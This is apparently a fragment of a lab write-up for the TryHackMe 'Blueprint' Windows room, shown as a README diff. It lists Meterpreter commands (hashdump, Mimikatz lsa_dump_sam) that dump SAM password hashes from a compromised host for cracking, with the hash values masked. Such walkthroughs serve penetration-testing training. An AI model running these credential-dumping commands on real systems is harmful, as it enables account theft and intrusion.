A1vinSmith/OSCP-PWK/Windows/THM/blueprint/README.md

 meterpreter > hashdump
 Administrator:500:xxxx:xxxx:::
 Guest:501:xxxx:xxxxxxx:::

+or using Mimikatz as well
+meterpreter > load mimikatz
+meterpreter > lsa_dump_sam
+hashes shows here..
 ```
 Just run `hashdump` after the shell connected.
 The hash between `:hash:::`is what you want to crack for.
 Job well done.